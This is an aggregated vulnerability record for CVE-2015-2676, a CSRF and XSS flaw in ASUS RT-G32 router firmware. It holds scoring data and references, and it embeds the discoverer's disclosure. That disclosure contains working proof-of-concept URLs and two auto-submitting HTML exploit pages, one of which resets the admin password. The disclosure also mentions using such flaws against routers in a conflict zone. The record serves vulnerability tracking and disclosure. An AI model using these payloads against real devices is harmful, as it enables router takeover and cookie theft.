ID

VAR-201503-0298


CVE

CVE-2015-2676


TITLE

Asus RT-G32 Cross-site request forgery vulnerability in router firmware

Trust: 0.8

sources: JVNDB: JVNDB-2015-001913

DESCRIPTION

Cross-site request forgery (CSRF) vulnerability in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via a request to start_apply.htm. ASUS RT-G32 is a router device. Asus RT-G32 is prone to a cross-site request-forgery vulnerability. An attacker can exploit this issue to perform certain unauthorized actions and gain access to the affected device. Other attacks are also possible.

-------------------------
Affected products:
-------------------------

Vulnerable is the next model: ASUS RT-G32 with different versions of firmware. I checked in ASUS RT-G32 with firmware versions 2.0.2.6 and 2.0.3.2.

----------
Details:
----------

Cross-Site Scripting (WASC-08):

http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27
http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27
http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27
http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27

These vulnerabilities work as via GET, as via POST (work even without authorization).

ASUS RT-G32 XSS-1.html

<html>
<head>
<title>ASUS RT-G32 XSS exploit (C) 2015 MustLive</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/start_apply.htm" method="post">
<input type="hidden" name="next_page" value="'+alert(document.cookie)+'">
<input type="hidden" name="group_id" value="'+alert(document.cookie)+'">
<input type="hidden" name="action_script" value="'+alert(document.cookie)+'">
<input type="hidden" name="flag" value="'+alert(document.cookie)+'">
</form>
</body>
</html>

Cross-Site Request Forgery (WASC-09):

CSRF vulnerability allows to change different settings, including admin's password. As I showed in this exploit (post-auth).

ASUS RT-G32 CSRF-1.html

<html>
<head>
<title>ASUS RT-G32 CSRF exploit (C) 2015 MustLive</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/start_apply.htm" method="post">
<input type="hidden" name="http_passwd" value="admin">
<input type="hidden" name="http_passwd2" value="admin">
<input type="hidden" name="v_password2" value="admin">
<input type="hidden" name="action_mode" value="+Apply+">
</form>
</body>
</html>

I found this and other routers since summer to take control over terrorists in Crimea, Donetsk & Lugansk regions of Ukraine. Read about it in the list (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html) and in many my interviews (http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html). I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7644/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Trust: 2.61

sources: NVD: CVE-2015-2676 // JVNDB: JVNDB-2015-001913 // CNVD: CNVD-2015-01969 // BID: 73294 // VULHUB: VHN-80637 // PACKETSTORM: 130724

IOT TAXONOMY

category: ['Network device'] | sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2015-01969

AFFECTED PRODUCTS

vendor: asus | model: rt-g32 | scope: eq | version: 2.0.2.6

Trust: 2.5

vendor: asus | model: rt-g32 | scope: eq | version: 2.0.3.2

Trust: 2.5

vendor: asustek computer | model: rt-g32 | scope: - | version: -

Trust: 0.8

vendor: asustek computer | model: rt-g32 | scope: eq | version: 2.0.2.6

Trust: 0.8

vendor: asustek computer | model: rt-g32 | scope: eq | version: 2.0.3.2

Trust: 0.8

sources: CNVD: CNVD-2015-01969 // BID: 73294 // JVNDB: JVNDB-2015-001913 // CNNVD: CNNVD-201503-421 // NVD: CVE-2015-2676

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2015-2676
value: MEDIUM

Trust: 1.0

NVD: CVE-2015-2676
value: MEDIUM

Trust: 0.8

CNVD: CNVD-2015-01969
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201503-421
value: MEDIUM

Trust: 0.6

VULHUB: VHN-80637
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2015-2676
severity: MEDIUM
baseScore: 6.8
vectorString: AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.6
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2015-01969
severity: MEDIUM
baseScore: 6.8
vectorString: AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.6
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-80637
severity: MEDIUM
baseScore: 6.8
vectorString: AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.6
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: CNVD: CNVD-2015-01969 // VULHUB: VHN-80637 // JVNDB: JVNDB-2015-001913 // CNNVD: CNNVD-201503-421 // NVD: CVE-2015-2676

PROBLEMTYPE DATA

problemtype:CWE-352

Trust: 1.9

sources: VULHUB: VHN-80637 // JVNDB: JVNDB-2015-001913 // NVD: CVE-2015-2676

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201503-421

TYPE

cross-site request forgery

Trust: 0.6

sources: CNNVD: CNNVD-201503-421

CONFIGURATIONS

sources: JVNDB: JVNDB-2015-001913

PATCH

title: RT-G32 | url: http://www.asus.com/Networking/RTG32/

Trust: 0.8

sources: JVNDB: JVNDB-2015-001913

EXTERNAL IDS

db: NVD | id: CVE-2015-2676

Trust: 3.4

db: PACKETSTORM | id: 130724

Trust: 2.6

db: BID | id: 73294

Trust: 1.4

db: JVNDB | id: JVNDB-2015-001913

Trust: 0.8

db: CNNVD | id: CNNVD-201503-421

Trust: 0.7

db: CNVD | id: CNVD-2015-01969

Trust: 0.6

db: VULHUB | id: VHN-80637

Trust: 0.1

sources: CNVD: CNVD-2015-01969 // VULHUB: VHN-80637 // BID: 73294 // JVNDB: JVNDB-2015-001913 // PACKETSTORM: 130724 // CNNVD: CNNVD-201503-421 // NVD: CVE-2015-2676

REFERENCES

url:http://packetstormsecurity.com/files/130724/asus-rt-g32-cross-site-request-forgery-cross-site-scripting.html

Trust: 2.5

url:http://websecurity.com.ua/7644/

Trust: 2.5

url:http://seclists.org/fulldisclosure/2015/mar/42

Trust: 2.0

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2676

Trust: 1.4

url:http://www.securityfocus.com/bid/73294

Trust: 1.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2676

Trust: 0.8

url:http://www.asus.com/

Trust: 0.3

url:http://www.asus.com/networking/rtg32/

Trust: 0.3

url:http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-february/009077.html

Trust: 0.1

url:http://websecurity.com.ua

Trust: 0.1

url:http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27

Trust: 0.1

url:http://websecurity.com.ua/7644/

Trust: 0.1

url:http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27

Trust: 0.1

url:http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html

Trust: 0.1

url:http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27

Trust: 0.1

url:http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27

Trust: 0.1

url:http://site/start_apply.htm

Trust: 0.1

sources: CNVD: CNVD-2015-01969 // VULHUB: VHN-80637 // BID: 73294 // JVNDB: JVNDB-2015-001913 // PACKETSTORM: 130724 // CNNVD: CNNVD-201503-421 // NVD: CVE-2015-2676

CREDITS

MustLive

Trust: 0.4

sources: BID: 73294 // PACKETSTORM: 130724

SOURCES

db: CNVD | id: CNVD-2015-01969
db: VULHUB | id: VHN-80637
db: BID | id: 73294
db: JVNDB | id: JVNDB-2015-001913
db: PACKETSTORM | id: 130724
db: CNNVD | id: CNNVD-201503-421
db: NVD | id: CVE-2015-2676

LAST UPDATE DATE

2024-11-23T21:44:25.789000+00:00


SOURCES UPDATE DATE

db: CNVD | id: CNVD-2015-01969 | date: 2015-03-25T00:00:00
db: VULHUB | id: VHN-80637 | date: 2016-12-03T00:00:00
db: BID | id: 73294 | date: 2015-03-24T00:00:00
db: JVNDB | id: JVNDB-2015-001913 | date: 2015-03-25T00:00:00
db: CNNVD | id: CNNVD-201503-421 | date: 2015-03-24T00:00:00
db: NVD | id: CVE-2015-2676 | date: 2024-11-21T02:27:49.793

SOURCES RELEASE DATE

db: CNVD | id: CNVD-2015-01969 | date: 2015-03-25T00:00:00
db: VULHUB | id: VHN-80637 | date: 2015-03-23T00:00:00
db: BID | id: 73294 | date: 2015-03-24T00:00:00
db: JVNDB | id: JVNDB-2015-001913 | date: 2015-03-25T00:00:00
db: PACKETSTORM | id: 130724 | date: 2015-03-07T11:11:11
db: CNNVD | id: CNNVD-201503-421 | date: 2015-03-24T00:00:00
db: NVD | id: CVE-2015-2676 | date: 2015-03-23T16:59:03.617